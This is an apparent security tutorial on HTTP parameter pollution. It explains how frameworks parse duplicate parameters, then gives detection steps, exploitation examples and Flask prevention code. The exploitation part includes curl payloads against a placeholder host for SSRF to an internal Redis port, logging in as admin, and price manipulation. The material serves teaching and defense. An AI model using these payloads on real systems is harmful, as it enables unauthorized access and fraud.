HTTP Parameter Pollution

When different components of an application stack parse duplicate parameters differently, allowing attackers to send conflicting values that pass validation in one layer but execute in another

User Request → Nginx (PHP validation) → Python/Flask API → Database

Impact

• SSRF: Access internal services, cloud metadata

• Auth bypass: Privilege escalation, unauthorized access

• Business logic: Price manipulation, inventory bypass

• Cache poisoning: Serve malicious content to users

How Different Technologies Parse Duplicate Parameters

PHP	Uses last value (B)
Python/Flask	Uses first value (A)
Node.js/Express	Returns array [A, B]
Java/Tomcat	Uses first value (A)
ASP.NET	Concatenates "A,B"

Detection

Step 1: Identify Multi-Layer Architecture

Check HTTP response headers

curl -I https://target.com

Look for:

• Multiple Server headers

• X-Powered-By (indicates different tech)

• Different error message formats

Step 2: Test Parameter Handling

Test with duplicate parameter

curl "https://target.com/api?test=first&test=second" -v

• Check response body

• Check behavior differences

• Check logs

Step 3: Map Critical Parameters

?user=
?id=
?role=
?admin=
?price=
?url=
?file=
?email=

Exploitation Examples

SSRF Bypass

PHP proxy + Python backend

curl "https://target.com/fetch?url=http://localhost:6379&url=https://example.com"

• PHP validates second URL (safe), Python uses first (malicious)

Authentication Bypass

PHP validation + Python Flask authentication

curl -X POST "https://target.com/login?user=admin&user=guest" \
  -d "password=test123"

• PHP checks 'guest' is allowed, Flask authenticates as 'admin'

Price Manipulation

Node.js front-end + Java backend

curl -X POST "https://target.com/checkout?price=1&price=100" \
  -H "Content-Type: application/json" \
  -d '{"item":"laptop"}'

• Front-end displays price=100, backend charges price=1

Testing Checklist

• Multiple technologies in stack? (Check headers, errors)

• Duplicate parameters accepted? (Test with ?test=1&test=2)

• Different behaviors observed? (Response changes, logs differ)

• Critical operations via parameters? (Auth, payments, file access)

• WAF/validation present? (Error messages indicate filtering)

Prevention

Option 1: Reject Duplicates

Python/Flask example

from flask import request, abort

@app.before_request
def check_duplicate_params():
    for key in request.args.keys():
        if len(request.args.getlist(key)) > 1:
            abort(400, "Duplicate parameters not allowed")

Option 2: Use Same Parser Everywhere

• Use consistent parameter handling across stack

• Either always use first value OR always use last value

Option 3: Validate at Every Layer

# Don't rely on front-end validation only
# Backend must perform same checks
def get_user(user_id):
    # Validate again in backend
    if not is_authorized(current_user, user_id):
        raise Unauthorized()
    return fetch_user(user_id)